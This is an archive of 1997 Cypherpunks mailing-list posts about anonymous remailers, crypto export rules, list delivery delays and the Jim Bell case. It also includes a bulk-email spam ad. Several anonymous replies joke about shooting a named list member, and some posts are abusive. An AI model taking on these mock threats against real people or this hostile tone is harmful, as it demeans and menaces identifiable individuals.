experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Tue Aug 19 20:53:14 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 20 Aug 1997 11:53:14 +0800
Subject: INFOTECH WEEKLY - August 18, 1997
Message-ID: 




--- begin forwarded text


X-Authentication-Warning: nickkean.ihug.co.nz: p46-chch2.chch.ihug.co.nz
[207.214.13.46] didn't use HELO protocol
Date: Wed, 20 Aug 1997 13:02:50 -0400
From: Blair Anderson <"Blair Anderson"@nickkean.ihug.co.nz>
Organization: Techno Junk and Grey Matter [http://www.isdn.now.co.nz]
MIME-Version: 1.0
To: dcsb at ai.mit.edu
Subject: INFOTECH WEEKLY - August 18, 1997
Sender: bounce-dcsb at ai.mit.edu
Precedence: bulk
Reply-To: Blair Anderson <"Blair Anderson"@nickkean.ihug.co.nz>

Summary Report on New Zealand encryption export restrictions under
Wassanar/COCOM international agreements...


http://www.infotech.co.nz/spreports/asaint.html

--
Blair Anderson                mailto:blair at technologist.com

        "get a piece of the click"

Electronic Commerce, Encryption and Electronic Rights Management

Techno Junk and Grey Matter        mailto:Benefit at isdn.now.co.nz
Corporate Technology Consultants
50 Wainoni Road,
Christchurch,
New Zealand
phone  ++ 64 3 3894065
fax    ++ 64 3 3894065

Web Page(s):         http://www.isdn.now.co.nz/INDEX.HTM

-------- Caught in the Net for 25 years -----------

For help on using this list (especially unsubscribing), send a message to
"dcsb-request at ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From digital_matrix at hotmail.com  Tue Aug 19 21:06:22 1997
From: digital_matrix at hotmail.com (David Downey)
Date: Wed, 20 Aug 1997 12:06:22 +0800
Subject: David Downey asks to be shot
Message-ID: <19970820034801.16798.qmail@hotmail.com>



     Wow, I'm really moving up in the world. Now I've officially been 
classified as an enemy of the people. Cool! Where's my award money?

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From toto at sk.sympatico.ca  Tue Aug 19 21:41:07 1997
From: toto at sk.sympatico.ca (Toto)
Date: Wed, 20 Aug 1997 12:41:07 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.3.32.19970818234422.038013f4@mail.atl.bellsouth.net>
Message-ID: <33FA7114.5ED1@sk.sympatico.ca>



Robert A. Costner wrote:
> If anyone has any comments on how they have used the Georgia Cracker remailer, I'd appreciate the comments being emailed to me.  Anonymously or not.
> 
>   -- Robert, pooh at efga.org

Robert,
  I regularly teach members of health and mental-health mailing lists
and support groups how to use anonymous remailers, as well as how to
forge their headers to prevent remailer operators from discovering
their identity.
  A number of these people are from southern states, including 
Georgia, and have indicated that they find the ability to post
anonymously to health groups very valuable in allaying fears of
their sharing of personal health information coming back to 
haunt them.

  In particular, I advise people who are afflicted with such medical
conditions as Tourette Syndrome and OCD to use anonymous remailers
if they find (or fear) that their impulsivity in screaming "Bullshit!"
when they smell bullshit will cause them trouble in the future.
  Personally, when I email politicians and the like, I usually use
anonymous remailers, including the Georgia Cracker, so that I don't
have to worry about being discriminated against and/or investigated
and/or imprisoned for being afflicted with a physical and mental
condition which causes me great discomfort when I am forced to tell
polite lies under the guise of free speech.
  In short, a ratfucker is a ratfucker is a ratfucker, and if anyone
objects to being called one, then they should make an effort not to
be one, rather than calling for my head on a platter because I call
a spade a spade (or a "fucking shovel").

  Two nights ago I began to teach my niece and her high-school girl
friend how to use remailers for anonymity to communicate with others
in a manner that will not leave them vulnerable to tracking/stalking
by strangers.
  Law Enforcement Agencies fully recognize the need for anonymous
communications, setting up hotlines that they advertise as being
free from call-tracing, etc. Is this capacity to be denied to 
private citizens and groups who wish to communicate with those 
who need their help?

  If someone wants to spam me, or threaten me, or whatever, through
the use of anonymous remailers, fine--I have a delete key and I have
mail filters.
  If someone else is too fucking lazy or unconcerned with using the
available technology and tools to do the same, then where the fuck
do they find the time and energy to call for myself and others to
be held prisoner behind an ElectroMagnetic Curtain in order to 
"protect" them from "real life?"
  Every time some Nazi piece of shit announces his or her intention
to "protect" somebody, my freedom, privacy and human rights seem to
get thrown in the trash. 

  My lawyer in Austin, Larry Joe, once told me about a client who
phoned him from prison and said, "I have a TV and radio, I get
three meals a day and cigarettes, and there's even a weight room
here. It's not really like being in prison."
  Larry Joe asked him, "Do you have a key for the door?" The youth
replied, "No." Larry Joe told him, "Trust me...you're in prison."

  I'm growing tired of those who want to lock all of the doors on
the InterNet and control the keys so that the citizens will be
imprisoned behind an ElectroMagnetic Curtain where they are only
allowed to travel at the discretion of a higher authority.
  The only people who suffer from being imprisoned behind walls
of censorship and fascism are the poor and the powerless. The
Nazi rocket scientists, the Spamfords and the adult web site
operators will always emerge from the wars with a seat at a
Congressional fundraiser, it is the average citizen who always
is on the inside (of the Prison, Wall, or ElectroMagnetic Curtain)
looking out.

  My advice to well-meaning fascist censors is to stay the fuck out
of the InterNet regulation business, because there are too many 
people on the InterNet who have experienced its freedom and who will
no go easily into the dark night.
  I was in Poland shortly after the fall of The Wall, and was talking
to a lady who was describing how hard life had become in the resulting
"chaos of the new." I asked her if she thought that the citizens would
return to the former political system if conditions got bad enough.
  She said, "Over my dead body."

  Someone wants to shut down your remailer? Fine. I'll start one up.
They want to shut down my remailer? Fine, but what about the Eternity
Servers?
  Don't know about the Eternity Servers? They are waiting to route
around the damage caused by shutting down remailers, and there is
another technology waiting to replace the Eternity Servers if they
get shut down.

  I, for one, am not going to stand by listlessly while fascists
attempt to build an ElectroMagnetic Curtain around me.
  I have a byte, and I'm not afraid to use it.

Toto
"The Xenix Chainsaw Massacre"
http://bureau42.base.org/public/xenix
"WebWorld & the Mythical Circle of Eunuchs"
http://bureau42.base.org/public/webworld






From nobody at REPLAY.COM  Tue Aug 19 21:43:29 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 12:43:29 +0800
Subject: Anonymous Remailers
Message-ID: <199708200426.GAA09347@basement.replay.com>



Robert A. Costner wrote:
> 
> In Georgia, while we have won a temporary injunction and assume we will see the law 
fully struck down, EFGA is still involved in lawsuit against the state
over internet 
anonymity.  I actually don't contemplate another affidavit in this case,
but it may 
happen.  If I need to write another affidavit in support of the
remailer, I will only 
have about two weeks to get it done.

  Don't write an affidavit, write an indictment.
  Say, perhaps, an indictment of our founding fathers for their use of
anonymity,
as well as tacking a "use of crypto in commission of a crime" charge on
to the
indictment.
  You can site Paul Revere's use of cryptography ("one if by land, two
if by
sea) to implicate the whole bunch in a drug dealing child pornography
ring.
Perhaps you might even want to trace the founding fathers' use of
anonymity
and strong-lantern encryption to the moral corruption existing today.

LanternMonger
"The founding father of drug dealing child pornography rings."







From dformosa at st.nepean.uws.edu.au  Tue Aug 19 21:44:17 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Wed, 20 Aug 1997 12:44:17 +0800
Subject: Picketing With Packets
In-Reply-To: <1BBmBe2w165w@bwalk.dm.com>
Message-ID: 



On Mon, 18 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> ? the Platypus {aka David Formosa}  writes:

[...Standford wallis...]
 
> He's the loudest one. However in the week his system has been down,
> the amount of shit from Quantcom, newvest, etc hasn't subsided.

So we should work on stopping them.  Each one we stop it will be a little
harder to defend them selves.

> The answer is a technical solution that doesn't let the spammers drown
> out a discussion, if that's what you mean by censorship.

That is, you have one for me I hope.

[...]

> For reasons unknown, I seem to be on someone's mailing list for MMF's
> - I get A LOT of them in e-mail :-(

So you haven't seen the make "Make Dimitry Mad" posts to
alt.make.money.fast?  :D

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument







From whgiii at amaranth.com  Tue Aug 19 22:25:06 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Wed, 20 Aug 1997 13:25:06 +0800
Subject: Anonymous Remailers
In-Reply-To: <33FA7114.5ED1@sk.sympatico.ca>
Message-ID: <199708200516.AAA12287@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <33FA7114.5ED1 at sk.sympatico.ca>, on 08/19/97 
   at 10:22 PM, Toto  said:

>  Law Enforcement Agencies fully recognize the need for anonymous
>communications, setting up hotlines that they advertise as being free
>from call-tracing, etc. Is this capacity to be denied to  private
>citizens and groups who wish to communicate with those  who need their
>help?

I hope you really don't think that any call made to an LEA is "anonymous".
If in doubt try calling one of these "anonymous" lines and make several
crank calls and see how long before they are kicking in your door.

The LEA's do not beleive in anonymity only in having the sheeple beleive
in the false apperance of anonymity. Very simmilar how Clipper, GAK, and
weak crypto give the sheeple a false sence of security.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/pvrY9Co1n+aLhhAQGd1wQAn8nFin5lqRGdVmqqTxsEfIgXSV70UMJ0
psYVrYsMtfn9aNbCTyEUZgcyS+AdLoISjIGckM/+FUZjKDQT50gyJc5rH9j4cAQk
wS8Rc6vgJjbCO9aQT1HMqiG0NIX4EEoHZ5tMO+miC5n3KYLPjIidaduRPHMqIguB
ROj2Ou60otk=
=4jcR
-----END PGP SIGNATURE-----






From alan at ctrl-alt-del.com  Tue Aug 19 22:48:57 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Wed, 20 Aug 1997 13:48:57 +0800
Subject: David Downey asks to be shot
In-Reply-To: <19970820034801.16798.qmail@hotmail.com>
Message-ID: 



On Tue, 19 Aug 1997, David Downey wrote:

>      Wow, I'm really moving up in the world. Now I've officially been 
> classified as an enemy of the people. Cool! Where's my award money?

Hold your filled out request form in front of your chest and your prize
will be speeding along any time now.

Would you like that in .45 increments or .9mm?

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From nobody at REPLAY.COM  Tue Aug 19 22:54:19 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 13:54:19 +0800
Subject: David Downey asks to be shot
Message-ID: <199708200541.HAA16921@basement.replay.com>



Tim May wrote:
> 
> At 6:23 AM -0700 8/19/97, David D.W.Downey wrote:
> >blackjack at hotmail.com wrote:
> >> Saw your post in the newsgroups.
> >> Check this out!
> >  Ya know, this shit really pisses me off. I understand that we have to
> >protect everyone's rights if we wish are own to be protected.
> > I understand that we have to protect the enemies'
> >rights too, but can't we just shoo a few of them first? Lowers the
> >numbers needing protection and might help us out in the end.

> I agree. We should shoot a few of the enemies first.
> I suggest you be shot.

  Better yet, let's shoot the people "needing protection."
  Once they're dead, there will be no need for all those laws
designed to protect them.

  What a brilliant idea! I'll probably get the Nobel Peace Prize
for this one!

FuckingForVirginityMonger







From nobody at REPLAY.COM  Tue Aug 19 22:58:30 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 13:58:30 +0800
Subject: Unclear on Bell / Re: The Real Bell Issue / Re: Bell, etc
Message-ID: <199708200541.HAA16924@basement.replay.com>



Tim May wrote:
> One lesson, or reminder, I take from the Bell matter is this:
> 
> Avoid doing stupid and petty things like using multiple Social Security
> numbers, evading taxes, and releasing stink bombs into government (or
> other) offices.
> 
>  (These are things Bell has pled on, as I recall the transcripts, so
> there's little doubt about them. And had he pled not guilty and gone to
> trial, apparently the evidence would've convicted him on most of the
> charges. Perhaps this is why he pled.)

  I am unclear on something.
  Did the government imprison without bail a citizen who evaded taxes
and made a government office smell bad, or did the government allow
a terrorist who was actively plotting to overthrow the government
to plead guilty to inconsequential charges?

  If I get arrested for plotting to Nuke D.C., should I hire Bell's
lawyer and try to get it reduced to jaywalking? Or should I avoid
jaywalking to prevent getting arrested for plotting to Nuke D.C.?

???Monger







From nobody at neva.org  Tue Aug 19 23:06:14 1997
From: nobody at neva.org (Neva Remailer)
Date: Wed, 20 Aug 1997 14:06:14 +0800
Subject: David Downey asks to be shot
Message-ID: <199708200551.WAA20028@mail-gw2.pacbell.net>




William H. Geiger III wrote:
> Tim May  said:
> >At 6:23 AM -0700 8/19/97, David D.W.Downey wrote:
> >>blackjack at hotmail.com wrote:
> >>
> >>> Saw your post in the newsgroups.
> >>
> >>  I understand that we have to protect the enemies'
> >>rights too, but can't we just shoot a few of them first? Lowers the
> >>numbers needing protection and might help us out in the end.
> >>Grrrrrrr!!!!
> 
> >I agree. We should shoot a few of the enemies first.
> 
> >I suggest you be shot.
> 
> I'll second the motion shall we put it to a vote?? :)

  I vote one bullet. Motion carried.

BulletMonger







From apache at bear.apana.org.au  Tue Aug 19 23:23:25 1997
From: apache at bear.apana.org.au (Apache)
Date: Wed, 20 Aug 1997 14:23:25 +0800
Subject: Status of Cypherpunks list sites?
In-Reply-To: 
Message-ID: 



On Tue, 19 Aug 1997, Tim May wrote:

> Anyway, has anybody been doing any pings of the various lists to see which
> ones are  most available and have the lowest latencies for redistribution
> to subscribers?

This would be interesting.
 
> And shouldn't we all be making a more serious effort to drop the use of the
> "cypherpunks at toad.com" address, as John said some months back that he would
> support forwarding stuff for a while, but not necessarily forever. As it
> is, it just adds another hop and another potential weak link.

I think in principal this makes good sense. I am subscribed to toad and
cyberpass under 3 or 4 names and I find toad is by far the quickest in
turn around time to me. One thing of interest is that I was an early
subscriber to cyberpass as apache at quux.. and I get that mail fairly
promptly but under this nicks sub to cyberpass (much lower down on the
list of subscribers) the latency is usually in hours (4-8) with 
discussions sometimes over before I read them, whereas my sub to toad is
much prompter. I haven't done any statitics on this but I have been
watching as the posts come in and procmail tosses them into various
mailboxes. 






From Important.News at mail.impulse.net  Wed Aug 20 14:28:44 1997
From: Important.News at mail.impulse.net (Important.News at mail.impulse.net)
Date: Wed, 20 Aug 1997 14:28:44 -0700 (PDT)
Subject: 24 Hour CASH Grab is on......$$$$
Message-ID: <199708201949.MAA10483@red.impulse.net>


$$$  24 Hour CASH grab is on !! ...   $$$

Want to fill your mailbox with CASH and orders right away ?

You can. Just take advantage of this once in a lifetime CASH grab by
stuffing your ad in 1 million emailboxes!

That's 1,000,000 !

Cash, money orders and checks could start filling your mailbox in a
few days! The profits and results can be mind boggling. 

Bargain Cellar does it again ! 

Our techniques have been so successful that they are being
mimicked by others in their ad pitches. 

However, NO ONE has the targeted primary service lists that we do. 

If you're looking for a way to succeed NOW, the following chance of a
lifetime is for you..

You've seen what other services charge-  many charge 10 times this
amount and more. Retail email ads that make it tough for you to get a
running start on the way to success.

NOW...For the First time EVER ,, email ads to big lists are
affordable for everyone..
One advertiser reported regularly receiving an average 12 orders a day
during a run ! 

Just read what a few say about us..

" I have tried other bulk email services. Yours is the first that
really cared about my success...I am pulling responses like crazy! The
checks are coming in.. You have a customer for life !" C.H.

"Working with your business gave me hope that I could succeed....I was
about to give up...now I have more orders than I ever hoped
for....Your techniques and advice have made the difference..you mean
what you say" HR, Ca.  

SPECIAL Limited Offer..  24 HOURS ONLY !!

 Your ad sent to :

1million email addresses- $69.95 !

Now LOOK at this  !

GUARANTEE-

All ads postmarked within 24 hours of reading this message will
reach 1 million email addresses in the order of receipt. Our lists are
all professionally filtered for maximum positive response. THIS IS A
ONE TIME OFFER !

Order Form.
Name________________________________

Address_____________________________

City______________________State_____

Zip______________

EMAIL ADDRESS (( VERY IMPORTANT  ))
Please Note: We will not add your email address to our list.

Ad copy ( Place your ad below)




Please run my ad (above) according to the terms checked below.

____I am postmarking my order within 24 hours 

Enclosed is my check or money order for $_____________

Please make all checks payable to :
Bargain Cellar
Internet Advertising Dept.
1125 Lindero Cyn Rd
Dept A8241
Thousand Oaks, CA 91362
.................................................................

Money Orders get immediate processing and ad runs ! Checks will
be processed for payment prior to any ad being sent.

We will not knowingly accept any ads which involve illegal or
pornographic material or reference.

Thank you and Welcome to Success !
Bargain Cellar
All Rights Reserved 1997





From kent at songbird.com  Wed Aug 20 00:08:52 1997
From: kent at songbird.com (Kent Crispin)
Date: Wed, 20 Aug 1997 15:08:52 +0800
Subject: bloodlust or game-theory? (was Re: Alex le Heux)
In-Reply-To: <199708181919.VAA19973@xs2.xs4all.nl>
Message-ID: <19970819234915.63274@bywater.songbird.com>



On Tue, Aug 19, 1997 at 12:26:57AM +0100, Adam Back wrote:
> 
[...]
> On AP/betting pools etc., politics and governments are all about
> force.  Why should governments have a monopoly on force?

By a reasonable definition whoever has a monopoly on force *is* the
government.  A rather significant body of history indicates that 
force monopolies arise spontaneously in any society.

[...]

> If you find your own government not extreme enough to feel comfortable
> evaluating net benefits to human happiness in removal of corrupt
> government officials, perhaps you would be happier evaluating societal
> benefits of theoretically removing some 3rd world countries more
> corrupt officials.
> 
> It's not bloodlust, it's game theory...

It's actually closer to a cult -- a small group with it's own shared
reality -- a reality quite at variance with societal norms.  The cult
has its own terminology, and an underlying dogma to which these code
words refer.  The cult has "special knowledge" that has been revealed
to them concerning massive changes that will happen to society --
changes that will usher in a new world order.  These changes may 
involve the world going through a cleansing fire of war of war and 
destruction. 

The members constantly reinforce each other's beliefs with stroking
messages -- eg:

    > >Congress was indeed a horrid idea.  We need no laws other that
    > > "do what you will as long as you don't physically injure, 
    > > or steal."  All else is congressional bullshit paid in 
    > > bloody tax money.
    >
    >Amen, brother.         

Certain of the members sport a messiah or a martyr complex.  It is 
also quite common for cults to call for arming the brethren against 
the coming struggle -- even the Heaven's Gate group apparently had 
stashes of weapons.

It's all so predictable.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From apache at bear.apana.org.au  Wed Aug 20 00:09:46 1997
From: apache at bear.apana.org.au (Apache)
Date: Wed, 20 Aug 1997 15:09:46 +0800
Subject: Status of Cypherpunks list sites?
In-Reply-To: 
Message-ID: 



On Wed, 20 Aug 1997, Apache wrote:

> subscriber to cyberpass as apache at quux.. and I get that mail fairly
> promptly but under this nicks sub to cyberpass (much lower down on the
> list of subscribers) the latency is usually in hours (4-8) with 

Well this post took 1.5 hours to turn around.

In any case toad is in general much faster for me. Anyone else (besides
JY) find this to be the case?






From nobody at neva.org  Wed Aug 20 00:14:11 1997
From: nobody at neva.org (Neva Remailer)
Date: Wed, 20 Aug 1997 15:14:11 +0800
Subject: Copyright Infringement Website / Re: CPAC Quotes Templeton
Message-ID: <199708200700.AAA29766@mail-gw.pacbell.net>




	WELCOME TO THE COPYRIGHT INFRINGEMENT WEBSITE
	---------------------------------------------

We are proud to offer you a variety of associated links to save
you valuable time while surfing the net.

Links:
          http://www.clari.net/brad/linkright.html
	http://toto.net/CrowbarsUpTheAnus
          http://www.clari.net/brad/linkright.html
	http://enoch.net/BananasInYourEar/
          http://www.clari.net/brad/linkright.html
	http://frissell.net/ToiletPlungerGames/
          http://www.clari.net/brad/linkright.html
	http://pooh.net/SmoothBabyBottoms/
          http://www.clari.net/brad/linkright.html








From nobody at REPLAY.COM  Wed Aug 20 00:14:49 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 15:14:49 +0800
Subject: The Real Bell Issue / Re: Bell, etc
Message-ID: <199708200700.JAA25135@basement.replay.com>



Duncan Frissell wrote:

> He could have been aggressive and fought instead of wimping out.  Lots of
> people have faced much more serious crimes and won.  It's not like Jim had
> anything better to do.

  The fact of the matter is, none of us know what Jim knows, and what
he knows is likely only what his government appointed schill has told
him. I recall Vin Suprynowicz mentioning a prominent attorney contacting
Bell's attorney in an effort to help, and receiving no reply.
  Neither do we know if Bell has merely decided that he should concede
the legal ground in order to be able to pursue the issue later, on
turf that suits him better.
 
> In such cases, an aggressive show of strength of character is best.  Weakness
> invites oppression. 

  We have already seen the results of Tim McVeigh wanting his government
schill replaced--a big FUCK YOU.
  McVeigh's problem is not weakness, but lack of knowledge about the
legal system and the quality of his legal representation. Unfortunately,
I have no doubt that the government already has lawyers in place whose
job thus far has been to gain McVeigh's trust, so that they can screw
up his appeals, as well.

TruthMonger







From hvdl at sequent.com  Wed Aug 20 00:17:32 1997
From: hvdl at sequent.com (Unicorn)
Date: Wed, 20 Aug 1997 15:17:32 +0800
Subject: HIP hip hooray
In-Reply-To: <199708130952.LAA17846@xs1.xs4all.nl>
Message-ID: <19970820085300.01356@sequent.com>



--- On Aug 16, Lucky Green apparently wrote -----------------------------------

> At 11:52 AM 8/13/97 +0200, Zooko Journeyman wrote:
> > A million monkeys operating under the pseudonym 
> > "Mark Grant " typed:
> >>
> >> Hey, Zooko! You were the only Cypherpunk who made the article in the
> >> 'Independent' (by that blonde reporter who was wandering around), though
> >> Lucky Green was mentioned by name.
> >
> >Wow.  Oh how the mighty have fallen, from an adulatory spread 
> >in Wired to a mention in The Independent.  And to think that 
> >Lucky was the fellow who was supposed to get the most benefit 
> >from the situation in the first place!
> 
> Lucky got much benefit from HIP. [What's the smiley for a *huge* grin?]

Well you have two possibilities:

:-D             Wider happy face (or Mistrel singers)
:-)))           reeeel happy, big smile

Always glad to be of help... Keep  in touch and we'll meet again in 2001
(if not sooner, some people in  the Netehrlands say that once every four
years just isn't enough ;-)

> --Lucky Green 

--- and thus sprach: Lucky Green  ------------------------

Ciao,
Unicorn.
-- 
======= _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ==============
     ,;( )_, )~\| Hans "Unicorn" Van de Looy     PGP: 64 07 5D 4C 3F 81 22 73
    ;; //  `--;   GSM: +31 653 261 368                52 9D 87 08 51 AA 35 F0
==='= ;\ = | ==== Youth is not a time in life, it's a State of Mind! ========






From nobody at REPLAY.COM  Wed Aug 20 00:21:49 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 15:21:49 +0800
Subject: David Downey asks to be shot
Message-ID: <199708200704.JAA25776@basement.replay.com>



David Downey wrote:
> 
>      Wow, I'm really moving up in the world. Now I've officially been
> classified as an enemy of the people. Cool! Where's my award money?

  Pick it up under the bridge at midnight.
  Come alone...






From remailer at bureau42.ml.org  Wed Aug 20 00:33:56 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Wed, 20 Aug 1997 15:33:56 +0800
Subject: No Subject
Message-ID: 



Toto wrote:

>   I, for one, am not going to stand by listlessly while fascists
> attempt to build an ElectroMagnetic Curtain around me.
>   I have a byte, and I'm not afraid to use it.
> 
> Toto
> "The Xenix Chainsaw Massacre"
> http://bureau42.base.org/public/xenix
> "WebWorld & the Mythical Circle of Eunuchs"
> http://bureau42.base.org/public/webworld

  And T.C. May has a *MegaByte*...

ByteMonger
"Take a MegaByte out of crime--do a denial of service attack on
Congress."







From nobody at REPLAY.COM  Wed Aug 20 00:46:47 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 15:46:47 +0800
Subject: bloodlust or game-theory?
Message-ID: <199708200729.JAA29547@basement.replay.com>



Kent Crispin finally came to his senses and described
government thusly:
> 
> It's actually closer to a cult -- a small group with it's own shared
> reality -- a reality quite at variance with societal norms.  The cult
> has its own terminology, and an underlying dogma to which these code
> words refer.  The cult has "special knowledge" that has been revealed
> to them concerning massive changes that will happen to society --
> changes that will usher in a new world order.  These changes may
> involve the world going through a cleansing fire of war of war and
> destruction.

  D.C. and the Pentagon, right?

> Certain of the members sport a messiah or a martyr complex.  It is
> also quite common for cults to call for arming the brethren against
> the coming struggle

  Yes, like Park Rangers with Uzi's, and Postal Service swat teams.

> It's all so predictable.

  As Tim May constantly reminds us, in regard to the cypherpunk list
archives.

  Glad to see that you're coming around, Kent, and finally recognizing
the government for the insider cult it has become.

KentMonger






From nobody at neva.org  Wed Aug 20 00:47:00 1997
From: nobody at neva.org (Neva Remailer)
Date: Wed, 20 Aug 1997 15:47:00 +0800
Subject: Status of Cypherpunks list sites?
Message-ID: <199708200730.AAA06171@mail-gw.pacbell.net>




Apache wrote:
> 
> I am subscribed to toad and
> cyberpass under 3 or 4 names and I find toad is by far the quickest in
> turn around time to me.

  They can do wonderful things with people having multiple personalities
these days. You ought to check it out.








From patrick at atro.pine.nl  Wed Aug 20 01:28:14 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Wed, 20 Aug 1997 16:28:14 +0800
Subject: HIP hip hooray
In-Reply-To: <19970820085300.01356@sequent.com>
Message-ID: <199708200801.KAA03584@atro.pine.nl>



> Always glad to be of help... Keep  in touch and we'll meet again in 2001
> (if not sooner, some people in  the Netehrlands say that once every four
> years just isn't enough ;-)

Rumours say it will be called HAL 2001 (hacking @ large)

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From apache at bear.apana.org.au  Wed Aug 20 01:35:56 1997
From: apache at bear.apana.org.au (Apache)
Date: Wed, 20 Aug 1997 16:35:56 +0800
Subject: Status of Cypherpunks list sites?
In-Reply-To: <199708200730.AAA06171@mail-gw.pacbell.net>
Message-ID: 



On Tue, 19 Aug 1997, Neva Remailer wrote:

> Apache wrote:
> > 
> > I am subscribed to toad and
> > cyberpass under 3 or 4 names and I find toad is by far the quickest in
> > turn around time to me.
> 
>   They can do wonderful things with people having multiple personalities
> these days. You ought to check it out.

if u bothered to pay attention u would discover that all posts are made as
apache or by my real name using apache@ accounts from whichever box I
happen to be on at the time. search the archives and do a 'who' on the
majordomos. if i was interested in exploring multiple personalities i
would use a remailer where such games would be harder to discover,
although many are unmasked eventually; some through error, some through
readers picking up various clues.

by way of note multiple subscriptions became quite common during the great
censorship debacle to ensure particular lists were getting uncensored and
complete feeds; no doubt that was before ur time though wasn't it.







From stewarts at ix.netcom.com  Wed Aug 20 02:51:00 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 20 Aug 1997 17:51:00 +0800
Subject: Cypherpunks as a Terrorist Organization
In-Reply-To: 
Message-ID: <3.0.2.32.19970820010925.02f74b5c@popd.ix.netcom.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 11:02 AM 8/19/97 -0400, Duncan Frissell wrote:
>State is lagging in issuing the terrorist organization list required
> by this law.  It is believed that they are chicken because most of the 
>groups would be Moslem groups and this would be considered [...] IRA ...

>In any case, I don't think that we have to worry because we don't fund 
>anyone.  We just send non-cash bits.  The law requires that a foreign 
>terrorist group on the "Attorney General's List" (actually State 
>Department) receive money or physical support.  

I've never sent real gold or silver money to the terrorist groups
_I_ support.  Maybe some pieces of paper with my writing and some MICR,
or maybe some notes from the Fed that promise to pay in US dollars, but
certainly no money...



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQBVAwUBM/qmNPthU5e7emAFAQGohgIAj+O+YN/Eyk6/M7L5+/g9Ap1HgNlQ/P7e
86KfFjDhwxE4xa1d5/ns9JKgHZb5S6lGNgQp9YzlFfriE7h7s5z2zQ==
=q7vW
-----END PGP SIGNATURE-----


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Wed Aug 20 03:09:31 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 20 Aug 1997 18:09:31 +0800
Subject: David Downey asks to be shot
In-Reply-To: <19970820034801.16798.qmail@hotmail.com>
Message-ID: <3.0.2.32.19970820011622.02f755a8@popd.ix.netcom.com>



At 08:48 PM 8/19/97 PDT, David Downey wrote:
>     Wow, I'm really moving up in the world. Now I've officially been 
>classified as an enemy of the people. Cool! Where's my award money?

No award money, but there's a lottery with your name on it .....
:-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From nobody at REPLAY.COM  Wed Aug 20 18:33:50 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 18:33:50 -0700 (PDT)
Subject: PGP 5.0
Message-ID: <199708210133.DAA02325@basement.replay.com>


John Wiley Councill IV wrote:
> 
> How secure is a  message encrypted with a 4096 bit key via PGP 5.0; what
> kind of processing power and resources would be required to crack such a
> message?

  A pencil, a slide rule, and 40 trillion pieces of legal size paper.






From alexlh at yourchoice.nl  Wed Aug 20 05:52:02 1997
From: alexlh at yourchoice.nl (Alex Le Heux)
Date: Wed, 20 Aug 1997 20:52:02 +0800
Subject: Alex le Heux
Message-ID: <199708201244.OAA15927@sarah.yc>



In article <199708181919.VAA19973 at xs2.xs4all.nl> you wrote:

: Hey HEY!  It's the man who nearly managed to single-handedly 
: derail the PGP legal export hack by playing the block rocking 
: beats (all vinyl) which inspired the vacationing hackers to 
: spill the drinks on the source books.

What's a sourcecode book without a few drinks spilled on it? :)

: Welcome to the list!

Thanks :)

: Zooko the Mysterieux

: P.S.  MP3 is coooool.  CDNow.com needs to start selling MP3's 
